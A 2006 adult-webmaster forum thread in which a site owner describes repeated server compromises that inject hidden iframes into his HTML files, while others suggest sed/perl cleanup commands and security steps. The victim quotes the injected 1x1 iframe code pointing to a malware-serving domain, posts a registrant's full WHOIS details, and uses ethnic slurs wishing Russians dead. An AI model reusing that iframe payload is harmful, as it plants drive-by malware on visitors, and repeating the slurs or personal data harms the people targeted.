fucking russian hackers! - GoFuckYourself.com

x3movies · 12-12-2006, 07:00 PM

again, for third time this year my server got fucking hacked and they modified all my .html files and added some fucking iframe with applets and shit. all over my dozens of domains. this is so fucking annoying i cannot take this anymore. how the fuck did they get in? if i only could get them fuckers i i cannot even imagine what i would do. i am so pissed now!

any how, my hosting provider is lookin on how they got in, any ideas on where i should check?

also is there a way to run a shell command to replace a string in all .html files accross a directory structure? i hate to spend next 20 hours going over all my files.

any help is appreciated.

x3movies · 12-12-2006, 07:02 PM

i am loosing traffic by thousands each fucking minute, damn!

jacked · 12-12-2006, 07:09 PM

show the code being added and maybe we can help you a little more

Jon Clark - BANNED FOR LIFE · 12-12-2006, 07:13 PM

First step is not calling them "fucking" anything.....

It is best to be nice to the Russians, Treat them the same as you would like to be treated....

NemesiS876 · 12-12-2006, 07:15 PM

Trie to defend whit Kaspersky

JOHNNY_BUTTHOLES · 12-12-2006, 07:18 PM

those cockfaces got me again today too. i had been free of them for a couple months now. i found it on a site i don't check regularly, so i don't know how many of my surfers got infected. fuck

deniska · 12-12-2006, 07:24 PM

if your with a good managed hosting provider, things like this would not happen.

rockbear · 12-12-2006, 07:25 PM

What is your host?

x3movies · 12-12-2006, 07:33 PM

i host with Webair.com, they were able to remove this IFRAME from all my files, so temporarily i am okay. but i still need to know how they got in so it does not happen again.

I dont hate every Russian, but why is like 99.9% of todays worlds hackers are Russians, they fucking suck and should die!

any how the code they included is as follows:
WARNING: access the page on your own rist it loads some applets and shit:

Code:

<iframe src='http://dgfjhewfndsbfsdvf.biz/adv/167/new.php' width=1 height=1></iframe><iframe src='http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167' width=1 height=1></iframe>

x3movies · 12-12-2006, 07:34 PM

Domain Name: DGFJHEWFNDSBFSDVF.BIZ
Domain ID: D15515786-BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID: 82
Domain Status: clientTransferProhibited
Registrant ID: OLNIC34919537
Registrant Name: Boriskin Gleb
Registrant Organization: Boriskin Gleb
Registrant Address1: vesekaya 4-155
Registrant City: Novosibirsk
Registrant State/Province: Novosibirsk
Registrant Postal Code: 109880
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +7.3098098911
Registrant Facsimile Number: +7.3098098911

Name Server: NS3.ASDBIZ.BIZ
Name Server: NS4.ASDBIZ.BIZ
Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Last Updated by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Registration Date: Tue Dec 05 15:38:47 GMT 2006
Domain Expiration Date: Tue Dec 04 23:59:59 GMT 2007
Domain Last Updated Date: Thu Dec 07 12:05:47 GMT 2006

FUCKING RUSSIAN!

micker · 12-12-2006, 08:07 PM

ok, if all the files are in the same directory you can just run this...

cat * | sed 's/$FIND/$REPLACE/g'

change $FIND to what you want to match and $REPLACE with what you want to change it to.

JD · 12-12-2006, 08:10 PM

:::sigh::: search for "megacount" and you'll see a shitload of threads and about 2 are mine. The ONLY thing that seemed to work was changing every password on the box. That means all scripts/ftp/ssh/etc

JOHNNY_BUTTHOLES · 12-12-2006, 08:12 PM

Quote:

Originally Posted by SPeRMiNaToR

:::sigh::: search for "megacount" and you'll see a shitload of threads and about 2 are mine. The ONLY thing that seemed to work was changing every password on the box. That means all scripts/ftp/ssh/etc

not just that. you have to make each file 'read only' which is an even bigger pain in the ass

JD · 12-12-2006, 08:15 PM

Quote:

Originally Posted by JOHNNY_BUTTHOLES

not just that. you have to make each file 'read only' which is an even bigger pain in the ass

trust me, I tried everything and making them read only didn't do shit.

x3movies · 12-12-2006, 08:16 PM

no shit, you guys never found how they got in? amazing....

starpimps · 12-12-2006, 08:21 PM

russians are crazy i kno first hand

RawAlex · 12-12-2006, 08:48 PM

x3movies, you might want to closely check your PC and the PC of anyone who has FTP access to your box. You may have a keylogger or similar on your machine sending out stuff.

Also, check every piece of software you are using, from blogs to TGPs and CMS systems... almost every one of them has had some sort of hole in it that can be exploited. Make sure you are up to date, otherwise they will just keep walking in the same hole.

Domain Distribution · 12-12-2006, 08:49 PM

russian hackers lol

Star 69 · 12-13-2006, 07:10 AM

Don't fuck with russians. Not all the russians are hackers.

Vigilante · 12-13-2006, 07:21 AM

Quote:

Originally Posted by Star 69

Don't fuck with russians. Not all the russians are hackers.

Exactly.. You forgot about drug dealers and simple criminals

As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/

drjones · 12-13-2006, 07:36 AM

Quote:

Originally Posted by micker

ok, if all the files are in the same directory you can just run this...

cat * | sed 's/$FIND/$REPLACE/g'

change $FIND to what you want to match and $REPLACE with what you want to change it to.

For a slightly safer version of that command, that will back up your files, and only try to modify .html files, try this.. should run from the document root of your webserver.

perl -pi'.orig' -e 's/$FIND/$REPLACE/g' `find ./ -name "*.html"`

It will back up the all the original files with a .orig extension as it runs, so if you make a mistake with the regex you can start over. The files with the text substitution will have the original file name.

DarkJedi · 12-13-2006, 09:38 AM

Quote:

Originally Posted by x3movies

i host with Webair.com

hahahahaha

get a real host dude.

WDjay · 12-13-2006, 09:44 AM

six figure sys admins are worth thier weight in gold

Star 69 · 12-13-2006, 01:56 PM

Quote:

Originally Posted by Vigilante

Exactly.. You forgot about drug dealers and simple criminals

As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/

A lot of smart people live in Russia

VicD · 12-13-2006, 02:05 PM

Quote:

Originally Posted by Star 69

A lot of smart people live in Russia

Every country has smart and dumb people...

Denis_SC · 12-13-2006, 02:33 PM

Quote:

Originally Posted by Vigilante

Exactly.. You forgot about drug dealers and simple criminals

As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/

Yeah ...

Now stfu and pay me for this month

Wilbo · 12-13-2006, 02:35 PM

I used to get hit with these guys, then I turned off the ftp server and it stopped. So that would lead me to believe it was an ftp hack.

who · 12-13-2006, 03:00 PM

You guys should look into curing SQL injection.

micker · 12-13-2006, 03:45 PM

Quote:

Originally Posted by drjones

For a slightly safer version of that command, that will back up your files, and only try to modify .html files, try this.. should run from the document root of your webserver.

perl -pi'.orig' -e 's/$FIND/$REPLACE/g' `find ./ -name "*.html"`

It will back up the all the original files with a .orig extension as it runs, so if you make a mistake with the regex you can start over. The files with the text substitution will have the original file name.

I realize now that I had meant for that to be cat *.html and not just the wilcard. It was late when I posted that...

I like your solution better than mine though.. I need to get more comfortable with perl.

x3movies · 12-15-2006, 10:04 PM

got hit again. i am loosing it...........

jerzeemedia · 12-15-2006, 10:20 PM

x3movies,

Contact me on ICQ, I can more likely than not help. 251095197

-JM

jerzeemedia · 12-15-2006, 10:21 PM

EDIT: free of charge

Nookster · 12-15-2006, 10:31 PM

Ever heard of back-ups?

sam from montreal · 12-15-2006, 11:13 PM

i got hacked too... an Iframe installing a Trojan horse

quantum-x · 12-15-2006, 11:34 PM

Get yourself a copy of CentOS and Atomic Secured Linux
[http://atomicorp.com/amember/signup.php]

And kiss all these problems goodbye.

porn blogger · 12-16-2006, 02:39 AM

Quote:

Originally Posted by WDjay

six figure sys admins are worth thier weight in gold

when is the last time you evaluated a sysadmins weight? most of the ones i know are morbidly obese just as the cliche offers.

rigrunner · 12-16-2006, 05:06 AM

i had this a while back host said it was something to do with awstats..

12-12-2006, 07:00 PM	#1
x3movies Registered User Join Date: Sep 2005 Posts: 91	fucking russian hackers! again, for third time this year my server got fucking hacked and they modified all my .html files and added some fucking iframe with applets and shit. all over my dozens of domains. this is so fucking annoying i cannot take this anymore. how the fuck did they get in? if i only could get them fuckers i i cannot even imagine what i would do. i am so pissed now! any how, my hosting provider is lookin on how they got in, any ideas on where i should check? also is there a way to run a shell command to replace a string in all .html files accross a directory structure? i hate to spend next 20 hours going over all my files. any help is appreciated. __________________ 2B \|\| !2B

12-12-2006, 07:02 PM	#2
x3movies Registered User Join Date: Sep 2005 Posts: 91	i am loosing traffic by thousands each fucking minute, damn! __________________ 2B \|\| !2B

12-12-2006, 07:09 PM	#3
jacked sperm tail Industry Role: Join Date: May 2004 Location: nj Posts: 11,019	show the code being added and maybe we can help you a little more __________________ Got Cam Models? icq: 361-607-616

12-12-2006, 07:18 PM	#6
JOHNNY_BUTTHOLES Confirmed User Join Date: Jun 2006 Posts: 146	those cockfaces got me again today too. i had been free of them for a couple months now. i found it on a site i don't check regularly, so i don't know how many of my surfers got infected. fuck __________________

12-12-2006, 07:33 PM	#9
x3movies Registered User Join Date: Sep 2005 Posts: 91	i host with Webair.com, they were able to remove this IFRAME from all my files, so temporarily i am okay. but i still need to know how they got in so it does not happen again. I dont hate every Russian, but why is like 99.9% of todays worlds hackers are Russians, they fucking suck and should die! any how the code they included is as follows: WARNING: access the page on your own rist it loads some applets and shit: Code: <iframe src='http://dgfjhewfndsbfsdvf.biz/adv/167/new.php' width=1 height=1></iframe><iframe src='http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167' width=1 height=1></iframe> __________________ 2B \|\| !2B

12-12-2006, 07:13 PM	#4
Jon Clark - BANNED FOR LIFE North Coast Pimp Join Date: Dec 2005 Location: 304-534-757 Posts: 9,395	First step is not calling them "fucking" anything..... It is best to be nice to the Russians, Treat them the same as you would like to be treated....

12-12-2006, 07:15 PM	#5
NemesiS876 Confirmed User Industry Role: Join Date: May 2006 Posts: 7,436	Trie to defend whit Kaspersky

12-12-2006, 07:24 PM	#7
deniska Confirmed User Industry Role: Join Date: Mar 2001 Location: Miami Beach, FL Posts: 1,053	if your with a good managed hosting provider, things like this would not happen.

12-12-2006, 07:25 PM	#8
rockbear Confirmed User Join Date: Jul 2003 Posts: 806	What is your host?

12-12-2006, 07:34 PM	#10
x3movies Registered User Join Date: Sep 2005 Posts: 91	Domain Name: DGFJHEWFNDSBFSDVF.BIZ Domain ID: D15515786-BIZ Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Sponsoring Registrar IANA ID: 82 Domain Status: clientTransferProhibited Registrant ID: OLNIC34919537 Registrant Name: Boriskin Gleb Registrant Organization: Boriskin Gleb Registrant Address1: vesekaya 4-155 Registrant City: Novosibirsk Registrant State/Province: Novosibirsk Registrant Postal Code: 109880 Registrant Country: Russian Federation Registrant Country Code: RU Registrant Phone Number: +7.3098098911 Registrant Facsimile Number: +7.3098098911 Name Server: NS3.ASDBIZ.BIZ Name Server: NS4.ASDBIZ.BIZ Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Last Updated by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Domain Registration Date: Tue Dec 05 15:38:47 GMT 2006 Domain Expiration Date: Tue Dec 04 23:59:59 GMT 2007 Domain Last Updated Date: Thu Dec 07 12:05:47 GMT 2006 FUCKING RUSSIAN! __________________ 2B \|\| !2B

12-12-2006, 08:07 PM	#11
micker Confirmed User Join Date: Nov 2005 Location: Metro Detroit Posts: 748	ok, if all the files are in the same directory you can just run this... cat * \| sed 's/$FIND/$REPLACE/g' change $FIND to what you want to match and $REPLACE with what you want to change it to.

12-12-2006, 08:10 PM	#12
JD Too lazy to set a custom title Industry Role: Join Date: Sep 2003 Posts: 22,651	:::sigh::: search for "megacount" and you'll see a shitload of threads and about 2 are mine. The ONLY thing that seemed to work was changing every password on the box. That means all scripts/ftp/ssh/etc

12-12-2006, 08:16 PM	#15
x3movies Registered User Join Date: Sep 2005 Posts: 91	no shit, you guys never found how they got in? amazing.... __________________ 2B \|\| !2B

12-12-2006, 08:21 PM	#16
starpimps Confirmed User Join Date: Sep 2006 Location: internets Posts: 6,954	russians are crazy i kno first hand __________________ Teen Porn Models / Solo Girls

12-12-2006, 08:48 PM	#17
RawAlex So Fucking Banned Join Date: Oct 2003 Location: In a house. Posts: 9,465	x3movies, you might want to closely check your PC and the PC of anyone who has FTP access to your box. You may have a keylogger or similar on your machine sending out stuff. Also, check every piece of software you are using, from blogs to TGPs and CMS systems... almost every one of them has had some sort of hole in it that can be exploited. Make sure you are up to date, otherwise they will just keep walking in the same hole.

12-12-2006, 08:49 PM	#18
Domain Distribution Ask me about negative cash flow Join Date: May 2006 Posts: 539	russian hackers lol __________________ Artifical Intelligence AIM Bot ~ $199.00 [email protected] 238102273

12-13-2006, 07:10 AM	#19
Star 69 Confirmed User Join Date: Nov 2005 Location: Russia Posts: 8,602	Don't fuck with russians. Not all the russians are hackers. __________________ e-mail star69

12-13-2006, 09:44 AM	#23
WDjay Confirmed User Join Date: Feb 2006 Location: So.Cal Posts: 381	six figure sys admins are worth thier weight in gold __________________

12-13-2006, 02:35 PM	#27
Wilbo Confirmed User Join Date: Mar 2001 Location: Baltimore Posts: 2,082	I used to get hit with these guys, then I turned off the ftp server and it stopped. So that would lead me to believe it was an ftp hack.

12-13-2006, 03:00 PM	#28
who So Fucking Banned Join Date: Aug 2003 Location: ICQ #23642053 Posts: 19,593	You guys should look into curing SQL injection.

12-15-2006, 10:04 PM	#30
x3movies Registered User Join Date: Sep 2005 Posts: 91	got hit again. i am loosing it........... __________________ 2B \|\| !2B

12-15-2006, 10:20 PM	#31
jerzeemedia Confirmed User Industry Role: Join Date: May 2004 Location: New Jersey Posts: 1,532	x3movies, Contact me on ICQ, I can more likely than not help. 251095197 -JM __________________ Free Adult Blog Hosting http://www.waqn.com free porn www.mojohost.com - Best guys, best host.

12-15-2006, 10:21 PM	#32
jerzeemedia Confirmed User Industry Role: Join Date: May 2004 Location: New Jersey Posts: 1,532	EDIT: free of charge __________________ Free Adult Blog Hosting http://www.waqn.com free porn www.mojohost.com - Best guys, best host.

12-15-2006, 10:31 PM	#33
Nookster Confirmed IT Professional Industry Role: Join Date: Nov 2005 Location: Hollywood, CA Posts: 3,744	Ever heard of back-ups? __________________ The Best Affiliate Software, Ever.

12-15-2006, 11:13 PM	#34
sam from montreal Confirmed User Join Date: Nov 2003 Location: QC Posts: 296	i got hacked too... an Iframe installing a Trojan horse __________________ SEO r0ck st@r Giving tips 107776092 [email protected]

12-15-2006, 11:34 PM	#35
quantum-x Confirmed User Join Date: Feb 2002 Location: ICQ: 251425 Fr/Au/Ca Posts: 6,863	Get yourself a copy of CentOS and Atomic Secured Linux [http://atomicorp.com/amember/signup.php] And kiss all these problems goodbye. __________________ PrettyInCash.com - BoozedGFs.com - TeenGFs.com - JizzGFs.com- MilfUploads.com -

12-16-2006, 05:06 AM	#37
rigrunner Confirmed User Industry Role: Join Date: Jan 2004 Location: UK Posts: 877	i had this a while back host said it was something to do with awstats.. __________________ Get Nasty - Make Bank Here